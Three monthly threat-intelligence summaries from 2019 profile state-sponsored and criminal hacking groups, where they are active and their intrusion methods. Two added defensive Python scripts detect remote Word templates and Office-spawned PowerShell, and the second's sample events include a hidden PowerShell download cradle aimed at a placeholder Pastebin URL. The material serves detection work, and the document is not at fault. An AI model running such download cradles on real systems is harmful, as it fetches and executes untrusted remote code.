Monthly Threat Actor Group Intelligence Report, September 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from August 21 to September 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA05, and SectorA07, were found among SectorA hacking groups this September.

Two parallel requirements continue to drive SectorA hacking activity: collecting high-quality information on government activity, such as political and diplomatic activity related to South Korea or to SectorA relief organizations, and illegally profiting from crime around the world. These strategic purposes have been stable for a long time and are expected to remain unchanged for the time being.

The hacking activities of the SectorA01, SectorA05 and SectorA07 groups discovered in September were all related to collecting high-level information such as political and diplomatic activity related to South Korea.

SectorA01 group activity was found in South Korea, Germany, the United States, China, and Austria. The group used malware in the form of Hangul (HWP) document files, a word processor format widely used by South Korean government agencies.

SectorA05 group activity was found in the United States, South Korea, Peru, Belgium, France, China, Japan, the United Kingdom, Slovakia, Russia and Poland. The group used spear phishing emails to deliver malware in the form of Microsoft Word files to its targets. The lure documents covered topics related to economic sanctions on SectorA, nuclear development, and submarines.

SectorA07 group activity was found in South Korea, Italy, Vietnam, Japan, and Brazil. The attacker used a Windows executable whose file name referred to an MOU contract with the Department of Defense, disguised with the Microsoft Word icon so that it would pass for a document.

2. SectorB Activity Features

A total of eight hacking groups, SectorB01, SectorB03, SectorB09, SectorB11, SectorB14, SectorB19, SectorB20, and SectorB21, were found among SectorB hacking groups this September.

The hacking activities of the SectorB groups discovered to date have been found in Southeast Asia (including Thailand, Singapore, Indonesia, Philippines, Vietnam, Malaysia and India), the Middle East (including Turkey), East Asia (including Taiwan, Macau, Hong Kong, Japan and South Korea), North America (including the United States), and Europe (including the United Kingdom and Russia). In addition, hacking activity was discovered in the Uyghur region, which we believe was targeted for political purposes.

The SectorB hacking groups use spear phishing with attached document files that exploit N-day vulnerabilities in Microsoft Office, that is, publicly known and already patched vulnerabilities that still work against targets who have not applied the patch. This method of intrusion is common for them when targeting developing countries, such as those in Southeast Asia.

In addition, the SectorB21 group performed hacking activities using Android malware to steal high-level information from smartphones of specific people in the Uyghur region.

Since the SectorB hacking activity discovered in September was mostly concentrated in Southeast Asia, it appears to be closely related to the political and diplomatic activities of the SectorB government. SectorB group activity is therefore expected to continue, especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. The SectorC08 group had previously been observed only in Europe; this is the first time its hacking activity has been found in East Asia (including China and South Korea), and additional analysis of its purpose is required. Although the SectorC groups whose activity was found use different hacking techniques, their spear phishing emails share common characteristics.

The SectorC01 group attaches a malicious Microsoft Word document to its spear phishing emails and uses remote template injection: the attached file itself carries no macro, but references a template on an attacker-controlled server, which Word fetches when the document is opened and which contains the macro script that runs on the target.

Similar to past hacking cases, the SectorC08 group maintains its traditional approach of spear phishing emails with 7-Zip SFX (self-extracting) archives attached. However, we also confirmed that its hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have accumulated a wide variety of attack techniques over their long history, and they are likely to continue this form of hacking in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries that are political rivals of the SectorD government. Their hacking activity discovered in September targeted countries in the Middle East (including Morocco, Kuwait and the United Arab Emirates); other targets were the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to previous cases: a Microsoft Word file with a malicious macro is sent to the target as an attachment to a spear phishing email. In addition, the SectorD05 group launched attacks against researchers in the United States, the Middle East and France whose academic work focuses on SectorD, and phishing attacks targeting SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofed sites disguised as login pages and steals the credentials that targeted individuals enter there.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely the preparation stage of a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05, were found among SectorE hacking groups this September. Their activities were discovered in Europe (including Belgium, Portugal, the United Kingdom, France and Russia), Southeast Asia (including Singapore, Sri Lanka, the Philippines and Thailand), East Asia (including Taiwan and China), North America (including the United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups have mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but the geographical range of these groups' activity has recently been widening.

The basic hacking techniques of the SectorE groups use documents attached to spear phishing emails: a Microsoft Office document with a malicious macro or with an exploit for a previously known code execution vulnerability, or an InPage document, a word processor format used frequently only in certain regions. In September they hosted a Microsoft Word document containing a macro script on a specific domain and used it as a remote template: the document delivered to the target performs remote template injection, querying the attacker's server to download the macro-bearing template when it is opened.
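The remote template injection technique described above for the SectorC01, SectorC08 and SectorE groups can be checked for without opening the document, because the reference to the external template lives in the package's relationship parts rather than in the visible text. The following Python script is an added example written for this summary, not code from NSHC or from the report: it unpacks a .docx (an OOXML zip package), reads every .rels part and flags an attachedTemplate relationship whose target is an external http(s) URL. The function names and the minimal sample documents it builds are constructed for illustration, and the template-host.invalid hostname is an assumed placeholder, not an observed indicator.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# OOXML relationship namespace and the relationship type Word uses for the
# attached (.dot/.dotm) template referenced from word/settings.xml.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def find_remote_templates(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every attachedTemplate relationship that points to an http(s) URL.

    When Word opens a .docx it resolves word/_rels/settings.xml.rels; an
    attachedTemplate entry with TargetMode="External" and a web URL makes Word
    fetch that template, together with any macro it carries, from the remote
    host. That fetch is what remote template injection relies on, so the
    relationship entry itself is the indicator.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        # Scan every .rels part, not only settings.xml.rels, so a template
        # relationship stashed in an unusual part is still found.
        for name in sorted(pkg.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode", "").lower() == "external"
                        and target.lower().startswith(("http://", "https://"))):
                    hits.append({"part": name, "id": rel.get("Id", ""),
                                 "target": target})
    return hits


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Build a minimal, constructed .docx for testing (not a captured lure).

    None yields a document with no attached template; a relative name such
    as "Normal.dotm" models a benign local template; an http(s) URL models
    the injection case.
    """
    rels = ['<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            '<Relationships xmlns="%s">' % REL_NS]
    if template_target is not None:
        rels.append('<Relationship Id="rId1" Type="%s" Target="%s" '
                    'TargetMode="External"/>' % (ATTACHED_TEMPLATE, template_target))
    rels.append("</Relationships>")

    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                     '<Default Extension="xml" ContentType="application/xml"/></Types>')
        pkg.writestr("word/document.xml",
                     '<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="%s">'
                     '<w:body><w:p><w:r><w:t>conference agenda</w:t></w:r></w:p></w:body>'
                     '</w:document>' % w_ns)
        pkg.writestr("word/settings.xml",
                     '<?xml version="1.0" encoding="UTF-8"?>'
                     '<w:settings xmlns:w="%s" xmlns:r="%s">%s</w:settings>'
                     % (w_ns, r_ns,
                        '<w:attachedTemplate r:id="rId1"/>' if template_target else ""))
        pkg.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Assumed hostname for the sample; .invalid is reserved and never resolves.
    for label, target in (("clean", None), ("local template", "Normal.dotm"),
                          ("remote template", "http://template-host.invalid/agenda.dotm")):
        print("%-16s -> %s" % (label, find_remote_templates(build_sample_docx(target))))
```

Run it over a suspicious attachment before anyone opens it; a non-empty result is a strong indicator on its own because ordinary documents reference templates by local or UNC path, not by URL. A template hosted on an internal http server would also be flagged, so compare the target against the organisation's known template locations rather than treating every hit as malicious.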

As the SectorE groups' geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques; in past cases, whenever the geographic radius of a hacking group's targets expanded, so did its hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The malware found in September is similar to malware found previously: a RAR archive containing an executable disguised with the Microsoft Word icon and a malicious DLL, matching the group's existing technique. The SectorF01 group uses DLL side loading to carry out the attack. When the executable disguised as Microsoft Word is run, it loads the DLL placed beside it in the same folder, so the malicious library is executed under the name of the legitimate one the program expects.

Because the group's activity has often been discovered in the SectorF region itself, some of it can be interpreted as targeting people who oppose the political activities of the SectorF government. However, the group also conducts hacking for the purpose of SectorF's economic development, so additional analysis is needed while continuing to track its activity areas and targets.

7. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September, although its activity is observed relatively infrequently compared with other government-supported hacking groups.

SectorH01 activity discovered in September was found in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware as Microsoft Excel files containing macro scripts through spear phishing emails. The macro script retrieves and executes JavaScript code hosted on Pastebin, which uses PowerShell to transfer an injector and the DLL it injects into the infected system, and then registers an autorun entry for persistence.

The SectorH01 group's increased and broadening hacking activity highlights the dynamics of competition between SectorE and SectorH. Close attention should be paid to future competition between the two countries and to whether this increased hacking activity will affect the international situation.

8. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 group was discovered this September.

Unlike government-sponsored hacking groups, SectorJ groups seize information of financial value to make money in the real world: they directly hack specific companies and organizations and run ransomware on their internal networks, or seize important industrial secrets in order to intimidate and extort the victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and the United States. The group sent targets a spear phishing email containing a link to download a JavaScript backdoor. Once installed, the malware resides in memory; when the victim accesses an online payment page, it injects skimming code into the HTML Document Object Model (DOM), which collects the payment information the user types into the form.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

For some time the group has been using spam emails with Microsoft Excel or Word documents attached, which install malware on the infected system that transmits the information collected there to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachment in the form of LNK shortcut files.

SectorJ09 group activity was found in Italy. The group attacked e-commerce service providers, injecting JavaScript into the payment pages of hotel websites built on a particular e-commerce service so that those pages load a remote script. Only when the page is accessed from a mobile device is the skimmer script loaded to steal credit card information, a condition that also keeps the skimmer out of view of anyone examining the page from a desktop browser.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07, were found among SectorA hacking groups this August. Two parallel requirements drive the SectorA hacking groups: collecting high-quality information related to South Korean political and diplomatic activity, and obtaining illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, the United States and Nepal. SectorA02 group activity was found in South Korea and the United States. The SectorA04 group, which had not been seen for a while, was found in South Korea, where malware was discovered that used a digital signature issued by a Korean security company. SectorA07 group activity was found in South Korea, Indonesia, the United States, the Russian Federation and Germany.

All four SectorA-related hacking groups discovered in August used spear phishing as their attack vector. However, SectorA01 uses Hangul (HWP) files as attachments in South Korea, while the SectorA02, SectorA04 and SectorA07 groups attach Microsoft Word files containing macros to their spear phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea's political and diplomatic activity and to North Korean relief organizations. Because of the large-scale economic sanctions surrounding SectorA, their hacking groups also carry out activity to steal financial information in other countries, including South Korea. These operations take place in parallel, and the SectorA groups are expected to continue hacking with the same purposes.

2. SectorB Activity Features

A total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07, were found among SectorB hacking groups this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC03 and SectorC08, were found among SectorC hacking groups this August.

The hacking activity of the SectorC02 group has been found in Brazil and Georgia.

The hacking activity of the SectorC03 group has been found in the United States and the United Kingdom.

The hacking activity of the SectorC08 group has been found in Ukraine, the United Kingdom, Belarus, Sweden, Argentina, the United States and China.

The SectorC groups used different attack vectors. The SectorC02 group stole sensitive email from internal Microsoft Exchange servers exposed to the Internet, while the SectorC03 and SectorC08 groups used spear phishing emails carrying malware as their primary hacking technique, as in their past activity.

The SectorC08 group is distinguished by its use of 7-Zip SFX (self-extracting) archives as attachments sent to specific hacking targets.

The SectorC groups have many more attack techniques at their disposal than the threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

A total of two hacking groups, SectorD02 and SectorD14, were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group's government are under way in Western countries, mainly the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber warfare accompanying physical conflict between the Middle East and Western countries.

5. SectorE Activity Features

A total of three hacking groups, SectorE01, SectorE02 and SectorE04, were found among SectorE hacking groups this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of the SectorE02 group was found in Pakistan, the United Kingdom, the United States, Ukraine, the Netherlands and Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, their hacking activity has often been discovered in the Southeast Asia region, and recently it has been carried out for the purpose of their country's economic development. The hacking activity radius of this group is expected to increase gradually, and further analysis of its activity areas and targets is needed.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of the SectorJ01 group has been found in the Russian Federation, Romania, the United Kingdom, Costa Rica and the United States; this August the group conducted campaigns in Europe and North America. The malware it distributes through spear phishing emails collects various types of personal and corporate information stored on the infected PCs.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

The SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing emails have an ACE archive attached, which contains a Visual Basic Script (VBScript) that fetches a malicious PowerShell script from the attacker's server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.



Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit, but judging by their hacking techniques and malware features, each group is aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, whereas the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails with malicious HWP or executable files attached. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and monetary gain. In the past, they mainly targeted financial companies and cryptocurrency exchanges for monetary gain, but they have now extended their range of targets to individual holders of cryptocurrency. Attention is needed as their range of activities expands.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six SectorB hacking groups were found to be active, in the following countries:

SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, the Netherlands, and Ukraine.

SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia.

SectorB04 group activity was discovered in East Asia, the Middle East and Europe, mainly in Taiwan, the Philippines, Turkey, and Austria.

SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan.

SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada.

SectorB14 group activity was discovered in East Asia and North America, mainly in South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08 and SectorC11, were found among the SectorC groups in June. They were active mainly in Europe, in Moldova, Ukraine and Germany, countries with which their government frequently has political friction. They continue to use spear phishing emails carrying malware, but the characteristics of the attached executables are gradually changing: they keep using open source programs such as the UltraVNC remote control tool, and have started building their malware on open source code. This is presumably done to bypass security solutions and analyst detection, and it also interferes with the intelligence analysis that tracks attackers, since code shared with legitimate projects is harder to attribute. SectorC groups are expected to continue hacking activities in countries with which they have political and diplomatic conflicts for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among the SectorD groups. They targeted countries in the Middle East with which they have a politically competitive relationship. SectorD02 group activity was discovered over a wide area stretching from Central Asia to the Middle East and beyond, mainly in Hong Kong, Sweden, Tajikistan, the United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, the United States and Mexico. SectorD11 group activity was discovered in the region from Central Asia to the Middle East.

They consistently use spear phishing emails with Microsoft Office document files attached. In particular, obfuscated macro scripts and PowerShell code are embedded in these documents to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilians who oppose the SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, the United Kingdom and the United States. They have consistently used spear phishing emails with Microsoft Office document files attached, but recently have also attached compressed files containing obfuscated HTA script files. Script-based malware of this kind evades detection by security solutions, and because the HTA file opens a normal decoy document when it runs, the target is given no reason to be suspicious.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files attached.

In this case, macro scripts within the document files use PowerShell to download additional scripts from Pastebin (a text file hosting site). This minimizes exposure of the next-stage payload even if the initial malware is detected by a security solution, and staging the payload on a public website that is open to the Internet lets the download pass controls that would block traffic to an attacker-owned server. SectorH01 group's hacking activities were mainly carried out against their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.
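The macro-to-PowerShell chains described for SectorH01 here and in the September summary, and the WMIC-to-PowerShell chain of SectorJ10 in the August summary, share one observable shape on the endpoint: an Office process, or a living-off-the-land binary it spawned, starts PowerShell with a download cradle, in SectorH01's case pointing at Pastebin. The following Python function is an added example written for this page, not NSHC detection logic or anything from the report: it walks a set of process-creation events (Sysmon Event ID 1 style fields, here a constructed sample) up the parent chain to find an Office ancestor and reports the suspicious command lines. The field names, process IDs, file paths and the pastebin.com/raw/EXAMPLE URL in the sample are assumed placeholders, not observed indicators.

```python
import re
from typing import Dict, List

# Office applications that should not normally spawn script interpreters.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land binaries commonly launched by malicious macros.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "cmd.exe",
           "cscript.exe", "wscript.exe", "regsvr32.exe", "rundll32.exe",
           "certutil.exe", "bitsadmin.exe"}
# Download cradles, encoded commands and paste-site staging in a command line.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"-enc(odedcommand)?\b|frombase64string|pastebin\.com/raw)",
    re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_office_spawn_chains(events: List[Dict], max_depth: int = 3) -> List[Dict]:
    """Flag LOLBin processes that descend from an Office process.

    Each event needs pid, ppid, image and cmdline. The parent chain is walked
    up to max_depth hops so that Word -> wmic -> powershell is caught even
    though powershell's direct parent is wmic, not Word. Each alert records
    the chain and the reasons, including any cradle patterns in the command line.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        child = basename(e["image"])
        if child not in LOLBINS:
            continue
        chain, ppid, depth, office = [child], e["ppid"], 0, None
        while ppid in by_pid and depth < max_depth:
            parent = by_pid[ppid]
            name = basename(parent["image"])
            chain.append(name)
            if name in OFFICE_APPS:
                office = name
                break
            ppid, depth = parent["ppid"], depth + 1
        if office is None:
            continue
        reasons = ["%s spawned %s" % (office, child)]
        # findall returns (outer group, inner group) tuples; keep the outer text.
        patterns = sorted({m[0].lower() for m in CRADLE_RE.findall(e["cmdline"])})
        if patterns:
            reasons.append("cradle patterns: " + ", ".join(patterns))
        alerts.append({"pid": e["pid"], "chain": " <- ".join(chain),
                       "cmdline": e["cmdline"], "reasons": reasons})
    return alerts


# Constructed sample events (not real telemetry); PIDs, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" C:\\Users\\user\\Downloads\\invoice.xlsm'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop IEX (New-Object Net.WebClient)"
                ".DownloadString('https://pastebin.com/raw/EXAMPLE')"},
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" C:\\Users\\user\\Downloads\\order.docm'},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic process call create powershell.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc SQBFAFgA"},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},   # an admin at a prompt: benign
]

if __name__ == "__main__":
    for alert in detect_office_spawn_chains(SAMPLE_EVENTS):
        print(alert["pid"], alert["chain"], "|", "; ".join(alert["reasons"]))
```

Fed with real process-creation telemetry, an Office ancestor plus a paste-site URL in the command line is a high-confidence signal, since no legitimate business document needs to pull code from Pastebin. The depth limit keeps the walk from reaching explorer.exe or the logon session and matching every interactive PowerShell window on the host.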

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

SectorJ04 Group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, and Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, South Korea, the Philippines, Taiwan, China, the United States, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.

